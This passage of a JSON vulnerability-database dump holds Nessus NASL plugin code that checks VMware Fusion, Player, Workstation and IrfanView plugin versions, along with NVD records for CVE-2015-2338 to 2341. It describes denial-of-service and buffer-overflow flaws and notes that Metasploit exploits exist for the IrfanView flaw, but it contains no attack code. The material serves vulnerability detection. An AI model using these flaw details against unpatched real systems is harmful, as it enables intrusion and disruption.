NULL;\nif (version =~ \"^6\\.\" && ver_compare(ver:version, fix:\"6.0.6\", strict:FALSE) == -1)\n fix = '6.0.6';\n\nelse if (version =~ \"^7\\.\" && ver_compare(ver:version, fix:\"7.0.1\", strict:FALSE) == -1)\n fix = '7.0.1';\n\nif(fix)\n {\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix + '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"VMware Fusion\", version, path);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-01T07:00:05", "description": "The version of VMware Player installed on the remote Linux host is 6.x\nprior to 6.0.6. It is, therefore, affected by a denial of service\nvulnerability due to improper validation of user-supplied input to a\nremote procedure call (RPC) command. An unauthenticated, remote\nattacker can exploit this, via a crafted command, to crash the host or\nguest operating systems.", "edition": 24, "published": "2015-06-16T00:00:00", "title": "VMware Player 6.x < 6.0.6 RPC Command DoS (VMSA-2015-0004) (Linux)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2341"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:vmware:player"], "id": "VMWARE_PLAYER_LINUX_6_0_6.NASL", "href": "https://www.tenable.com/plugins/nessus/84221", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84221);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/08/06 14:03:14\");\n\n script_cve_id(\"CVE-2015-2341\");\n script_bugtraq_id(75094);\n script_xref(name:\"VMSA\", value:\"2015-0004\");\n\n script_name(english:\"VMware Player 6.x < 6.0.6 RPC Command DoS (VMSA-2015-0004) (Linux)\");\n script_summary(english:\"Checks the VMware Player version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization 
application installed that is\naffected by a denial of service vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Player installed on the remote Linux host is 6.x\nprior to 6.0.6. It is, therefore, affected by a denial of service\nvulnerability due to improper validation of user-supplied input to a\nremote procedure call (RPC) command. An unauthenticated, remote\nattacker can exploit this, via a crafted command, to crash the host or\nguest operating systems.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0004.html\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to VMware Player version 6.0.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"General\");\n\n script_dependencies(\"vmware_player_linux_installed.nbin\");\n script_require_keys(\"Host/uname\", \"Host/VMware Player/Version\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (\"linux\" >!< tolower(get_kb_item(\"Host/uname\")))\n audit(AUDIT_OS_NOT, 
\"Linux\");\n\nversion = get_kb_item_or_exit(\"Host/VMware Player/Version\");\n\nfixed = \"6.0.6\";\nif (version =~ \"^6\\.\" && ver_compare(ver:version, fix:fixed, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report +=\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"VMware Player\", version);\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-01T03:16:41", "description": "The version of the IrfanView JPEG-2000 plugin (JPEG2000.dll) was found\nto be less than 4.33. Such versions are affected by a stack-based\nbuffer overflow vulnerability that can be triggered by tricking users\ninto opening a .JP2 file with a specially crafted Quantization Default\nsection. Successful exploitation may allow arbitrary code to be\nexecuted on the affected host subject to the privileges of the user.", "edition": 25, "published": "2012-07-05T00:00:00", "title": "IrfanView JPEG-2000 Plugin Remote Stack-based Buffer Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0897"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:irfanview:irfanview"], "id": "IRFANVIEW_JPEG2000_STACK_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/nessus/59846", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(59846);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\"CVE-2012-0897\");\n script_bugtraq_id(51426);\n\n script_name(english:\"IrfanView JPEG-2000 Plugin Remote Stack-based Buffer Overflow\");\n script_summary(english:\"Checks version of JPEG2000.dll\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote host has an application installed that is affected by a \nstack-based buffer overflow vulnerability.\"\n );\n 
script_set_attribute(\n attribute:\"description\",\n value:\n\"The version of the IrfanView JPEG-2000 plugin (JPEG2000.dll) was found\nto be less than 4.33. Such versions are affected by a stack-based\nbuffer overflow vulnerability that can be triggered by tricking users\ninto opening a .JP2 file with a specially crafted Quantization Default\nsection. Successful exploitation may allow arbitrary code to be\nexecuted on the affected host subject to the privileges of the user.\"\n );\n script_set_attribute(attribute:\"see_also\",value:\"https://www.irfanview.com/plugins.htm\");\n script_set_attribute(\n attribute:\"solution\",\n value:\"Upgrade the JPEG-2000 plugin to version 4.3.3.0 (4.33) or higher.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Irfanview JPEG2000 jp2 Stack Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\",value:\"2012/01/16\");\n script_set_attribute(attribute:\"patch_publication_date\",value:\"2012/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\",value:\"2012/07/05\");\n script_set_attribute(attribute:\"plugin_type\",value:\"local\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:irfanview:irfanview\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"irfanview_installed.nasl\");\n script_require_keys(\"SMB/IrfanView/Version\");\n\n 
exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"audit.inc\");\n\nplugin = \"JPEG2000.dll\";\nfix = '4.3.3.0';\n\nkb_base = 'SMB/IrfanView/';\nappname = \"IrfanView \" + plugin + \" plugin\";\npath = get_kb_item_or_exit(kb_base + 'Path');\n\npath += \"\\Plugins\\\" + plugin;\nplugin_version = get_kb_item_or_exit(kb_base + 'Plugin_Version/' + plugin);\n\nif (ver_compare(ver:plugin_version, fix:fix) == -1)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + plugin_version +\n '\\n Fixed version : ' + fix + ' (4.33)\\n';\n security_warning(port:get_kb_item('SMB/transport'), extra:report);\n }\n else security_warning(get_kb_item('SMB/transport'));\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, appname, plugin_version);\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T07:00:22", "description": "The version of VMware Workstation installed on the remote Windows host\nis 10.x prior to 10.0.5. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An unspecified flaw exists that allows a local attacker\n to escalate privileges or cause a denial of service\n via an arbitrary write to a file. (CVE-2014-8370)\n\n - An input validation error exists in the Host Guest File\n System (HGFS) that allows a local attacker to cause a\n denial of service of the guest operating system.\n (CVE-2015-1043)\n\n - An input validation error exists in the VMware\n Authorization process (vmware-authd) that allows a\n remote attacker to cause a denial of service of the host\n operating system. (CVE-2015-1044)\n\n - A denial of service vulnerability exists due to improper\n validation of user-supplied input to a remote procedure\n call (RPC) command. An unauthenticated, remote attacker\n can exploit this, via a crafted command, to crash the\n host or guest operating systems. 
(CVE-2015-2341)", "edition": 25, "published": "2015-02-05T00:00:00", "title": "VMware Workstation 10.x < 10.0.5 Multiple Vulnerabilities (VMSA-2015-0001 / VMSA-2015-0004) (Windows)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2341", "CVE-2015-1044", "CVE-2014-8370", "CVE-2015-1043"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:vmware:workstation"], "id": "VMWARE_WORKSTATION_MULTIPLE_VMSA_2015_0001.NASL", "href": "https://www.tenable.com/plugins/nessus/81187", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81187);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-8370\",\n \"CVE-2015-1043\",\n \"CVE-2015-1044\",\n \"CVE-2015-2341\"\n );\n script_bugtraq_id(\n 72336,\n 72337,\n 72338,\n 75094\n );\n script_xref(name:\"VMSA\", value:\"2015-0001\");\n script_xref(name:\"VMSA\", value:\"2015-0004\");\n\n script_name(english:\"VMware Workstation 10.x < 10.0.5 Multiple Vulnerabilities (VMSA-2015-0001 / VMSA-2015-0004) (Windows)\");\n script_summary(english:\"Checks the VMware Workstation version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization application installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Workstation installed on the remote Windows host\nis 10.x prior to 10.0.5. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An unspecified flaw exists that allows a local attacker\n to escalate privileges or cause a denial of service\n via an arbitrary write to a file. 
(CVE-2014-8370)\n\n - An input validation error exists in the Host Guest File\n System (HGFS) that allows a local attacker to cause a\n denial of service of the guest operating system.\n (CVE-2015-1043)\n\n - An input validation error exists in the VMware\n Authorization process (vmware-authd) that allows a\n remote attacker to cause a denial of service of the host\n operating system. (CVE-2015-1044)\n\n - A denial of service vulnerability exists due to improper\n validation of user-supplied input to a remote procedure\n call (RPC) command. An unauthenticated, remote attacker\n can exploit this, via a crafted command, to crash the\n host or guest operating systems. (CVE-2015-2341)\");\n # http://lists.vmware.com/pipermail/security-announce/2015/000286.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3bded33c\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0001.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0004.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware Workstation version 10.0.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-8370\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:vmware:workstation\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_workstation_detect.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"VMware/Workstation/Version\", \"VMware/Workstation/Path\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\nappname = 'VMware Workstation';\n\nversion = get_kb_item(\"VMware/Workstation/Version\");\nif (isnull(version)) audit(AUDIT_NOT_INST, appname);\n\npath = get_kb_item_or_exit(\"VMware/Workstation/Path\");\n\nfix = \"10.0.5\";\nif (version =~ \"^10\\.\" && ver_compare(ver:version, fix:fix, strict:FALSE) == -1)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity >0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix + '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, appname, version, path);\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "cve": [{"lastseen": "2020-10-03T12:49:49", "description": "TPInt.dll in VMware Workstation 10.x before 10.0.6 and 11.x before 11.1.1, VMware Player 6.x before 6.0.6 and 7.x before 7.1.1, and VMware Horizon Client 3.2.x before 3.2.1, 3.3.x, and 5.x local-mode before 5.4.2 on Windows does not properly allocate memory, which allows guest OS users to cause a host OS denial of service via unspecified vectors.", "edition": 3, "cvss3": {}, "published": "2015-06-13T14:59:00", "title": "CVE-2015-2340", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 6.1, "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2340"], "modified": "2016-12-31T02:59:00", "cpe": ["cpe:/a:vmware:player:6.0.4", "cpe:/a:vmware:fusion:6.0.3", "cpe:/a:vmware:player:6.0", "cpe:/a:vmware:player:6.0.5", "cpe:/a:vmware:player:6.0.2", "cpe:/a:vmware:workstation:10.0", "cpe:/a:vmware:workstation:10.0.2", "cpe:/a:vmware:player:7.0", "cpe:/a:vmware:fusion:7.0", "cpe:/a:vmware:fusion:6.0.5", "cpe:/a:vmware:player:7.1", "cpe:/a:vmware:workstation:10.0.1", "cpe:/a:vmware:fusion:6.0.1", "cpe:/a:vmware:horizon_view_client:5.4.1", "cpe:/a:vmware:fusion:6.0", "cpe:/a:vmware:horizon_view_client:5.4", "cpe:/a:vmware:player:6.0.1", "cpe:/a:vmware:player:6.0.3", "cpe:/a:vmware:workstation:10.0.3", "cpe:/a:vmware:workstation:11.1", "cpe:/a:vmware:fusion:7.0.1", "cpe:/a:vmware:fusion:6.0.4", "cpe:/a:vmware:horizon_client:3.2.0", "cpe:/a:vmware:fusion:6.0.2", "cpe:/a:vmware:workstation:10.0.5", "cpe:/a:vmware:workstation:10.0.4", "cpe:/a:vmware:workstation:11.0", "cpe:/a:vmware:horizon_client:3.3"], "id": "CVE-2015-2340", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2340", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:a:vmware:player:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_client:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:vmware:player:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_view_client:5.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_client:3.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_view_client:5.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:49:49", "description": "VMware Workstation 10.x before 10.0.5, VMware Player 6.x before 6.0.6, and VMware Fusion 6.x before 6.0.6 and 7.x before 7.0.1 allow attackers to cause a denial of service against a 32-bit guest OS or 64-bit host OS via a crafted RPC command.", "edition": 3, "cvss3": {}, "published": "2015-06-13T14:59:00", "title": "CVE-2015-2341", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2341"], "modified": "2016-12-31T02:59:00", "cpe": 
["cpe:/a:vmware:player:6.0.4", "cpe:/a:vmware:fusion:6.0.3", "cpe:/a:vmware:player:6.0", "cpe:/a:vmware:player:6.0.5", "cpe:/a:vmware:player:6.0.2", "cpe:/a:vmware:fusion:7.1.1", "cpe:/a:vmware:workstation:10.0", "cpe:/a:vmware:workstation:10.0.2", "cpe:/a:vmware:fusion:7.0", "cpe:/a:vmware:fusion:6.0.5", "cpe:/a:vmware:workstation:10.0.1", "cpe:/a:vmware:fusion:6.0.1", "cpe:/a:vmware:fusion:6.0", "cpe:/a:vmware:player:6.0.1", "cpe:/a:vmware:player:6.0.3", "cpe:/a:vmware:workstation:10.0.3", "cpe:/a:vmware:fusion:7.1.0", "cpe:/a:vmware:fusion:7.0.1", "cpe:/a:vmware:fusion:6.0.4", "cpe:/a:vmware:fusion:6.0.2", "cpe:/a:vmware:workstation:10.0.4"], "id": "CVE-2015-2341", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2341", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:a:vmware:fusion:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:7.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:7.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:49:49", "description": "TPview.dll in VMware Workstation 10.x before 10.0.6 and 11.x before 11.1.1, VMware Player 6.x before 6.0.6 and 
7.x before 7.1.1, and VMware Horizon Client 3.2.x before 3.2.1, 3.3.x, and 5.x local-mode before 5.4.2 on Windows does not properly allocate memory, which allows guest OS users to cause a host OS denial of service via unspecified vectors, a different vulnerability than CVE-2015-2338.", "edition": 3, "cvss3": {}, "published": "2015-06-13T14:59:00", "title": "CVE-2015-2339", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 6.1, "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2339"], "modified": "2016-12-31T02:59:00", "cpe": ["cpe:/a:vmware:player:6.0.4", "cpe:/a:vmware:fusion:6.0.3", "cpe:/a:vmware:player:6.0", "cpe:/a:vmware:player:6.0.5", "cpe:/a:vmware:player:6.0.2", "cpe:/a:vmware:workstation:10.0", "cpe:/a:vmware:workstation:10.0.2", "cpe:/a:vmware:player:7.0", "cpe:/a:vmware:fusion:7.0", "cpe:/a:vmware:fusion:6.0.5", "cpe:/a:vmware:player:7.1", "cpe:/a:vmware:workstation:10.0.1", "cpe:/a:vmware:fusion:6.0.1", "cpe:/a:vmware:horizon_view_client:5.4.1", "cpe:/a:vmware:fusion:6.0", "cpe:/a:vmware:horizon_view_client:5.4", "cpe:/a:vmware:player:6.0.1", "cpe:/a:vmware:player:6.0.3", "cpe:/a:vmware:workstation:10.0.3", "cpe:/a:vmware:workstation:11.1", "cpe:/a:vmware:fusion:7.0.1", "cpe:/a:vmware:fusion:6.0.4", "cpe:/a:vmware:horizon_client:3.2.0", "cpe:/a:vmware:fusion:6.0.2", "cpe:/a:vmware:workstation:10.0.5", "cpe:/a:vmware:workstation:10.0.4", "cpe:/a:vmware:workstation:11.0", "cpe:/a:vmware:horizon_client:3.3"], "id": "CVE-2015-2339", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2339", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:a:vmware:player:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_client:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_view_client:5.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_client:3.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_view_client:5.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:49:49", "description": "TPview.dll in VMware Workstation 10.x before 10.0.6 and 11.x before 11.1.1, VMware Player 6.x before 6.0.6 and 7.x before 7.1.1, and VMware Horizon Client 3.2.x before 3.2.1, 3.3.x, and 5.x local-mode before 5.4.2 on Windows does not properly allocate memory, which allows guest OS users to cause a host OS denial of service via unspecified vectors, a different vulnerability than CVE-2015-2339.", "edition": 3, 
"cvss3": {}, "published": "2015-06-13T14:59:00", "title": "CVE-2015-2338", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 6.1, "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2338"], "modified": "2016-12-31T02:59:00", "cpe": ["cpe:/a:vmware:player:6.0.4", "cpe:/a:vmware:fusion:6.0.3", "cpe:/a:vmware:player:6.0", "cpe:/a:vmware:player:6.0.5", "cpe:/a:vmware:player:6.0.2", "cpe:/a:vmware:workstation:10.0", "cpe:/a:vmware:workstation:10.0.2", "cpe:/a:vmware:player:7.0", "cpe:/a:vmware:fusion:7.0", "cpe:/a:vmware:fusion:6.0.5", "cpe:/a:vmware:player:7.1", "cpe:/a:vmware:workstation:10.0.1", "cpe:/a:vmware:fusion:6.0.1", "cpe:/a:vmware:horizon_view_client:5.4.1", "cpe:/a:vmware:fusion:6.0", "cpe:/a:vmware:horizon_view_client:5.4", "cpe:/a:vmware:player:6.0.1", "cpe:/a:vmware:player:6.0.3", "cpe:/a:vmware:workstation:10.0.3", "cpe:/a:vmware:workstation:11.1", "cpe:/a:vmware:fusion:7.0.1", "cpe:/a:vmware:fusion:6.0.4", "cpe:/a:vmware:horizon_client:3.2.0", "cpe:/a:vmware:fusion:6.0.2", "cpe:/a:vmware:workstation:10.0.5", "cpe:/a:vmware:workstation:10.0.4", "cpe:/a:vmware:workstation:11.0", "cpe:/a:vmware:horizon_client:3.3"], "id": "CVE-2015-2338", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2338", "cvss": {"score": 6.1, "vector": 